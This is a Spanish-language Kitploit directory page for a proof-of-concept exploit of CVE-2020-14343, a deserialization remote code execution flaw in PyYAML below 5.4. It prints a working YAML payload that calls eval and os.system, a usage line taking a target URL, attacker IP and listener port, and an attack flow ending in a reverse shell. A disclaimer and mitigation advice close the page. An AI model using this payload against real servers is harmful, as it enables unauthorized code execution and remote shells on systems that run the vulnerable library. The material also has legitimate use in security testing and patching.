Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-14343-PyYAML — Payload de CVE-2020-14343 | Kitploit
Herramientas/GitHubGitHub/kairo-one/cve-2020-14343-pyyaml
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubkairo-one/cve-2020-14343-pyyaml

CVE-2020-14343-PyYAML

Payload de CVE-2020-14343

Ver Repositorio
2hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-14343 POC de vulnerabilidad de deserialización de PyYAML

Resumen de la vulnerabilidad

Descargar herramienta
CampoInformación
ID de CVECVE-2020-14343
Componente afectadoPyYAML < 5.4
Tipo de vulnerabilidadEjecución remota de código por deserialización (RCE)
Nivel de riesgoAlto

Principio de la vulnerabilidad

Cuando PyYAML utiliza yaml.load() para analizar datos no confiables, no restringe las etiquetas YAML peligrosas (como !!python/object). Un atacante puede construir contenido YAML malicioso para ejecutar código arbitrario de Python.

Núcleo del payload:

root@kitploit:~
!!python/object/new:tuple
  - !!python/object/new:map
    - !!python/name:eval
    - ["__import__('os').system('command')"]

Uso

root@kitploit:~
python poc.py <目标URL> <攻击者IP> <监听端口>

Ejemplo:

root@kitploit:~
python poc.py http://vulnerable-site.com 192.168.1.100 4444

Flujo del ataque

  1. El script inicia un listener TCP en el equipo local.
  2. Sube un archivo YAML malicioso al endpoint /upload del objetivo.
  3. Activa el endpoint /login para cargar y analizar el YAML.
  4. El servidor objetivo ejecuta el payload y devuelve una shell inversa al atacante.

Instalación de dependencias

root@kitploit:~
pip install requests

Descargo de responsabilidad

⚠️ ¡Esta herramienta es exclusivamente para investigación de seguridad y pruebas autorizadas!

  • No la utilice con fines ilegales.
  • Asegúrese de haber obtenido la autorización del sistema objetivo antes de usarla.
  • El autor no se hace responsable de ningún uso indebido.

Recomendaciones de mitigación

  1. Use yaml.safe_load() en lugar de yaml.load().
  2. Actualice PyYAML a la versión 5.4 o superior.
  3. Valide estrictamente la entrada del usuario.

Enlaces de referencia

  • CVE-2020-14343 - NVD
  • Documentación oficial de PyYAML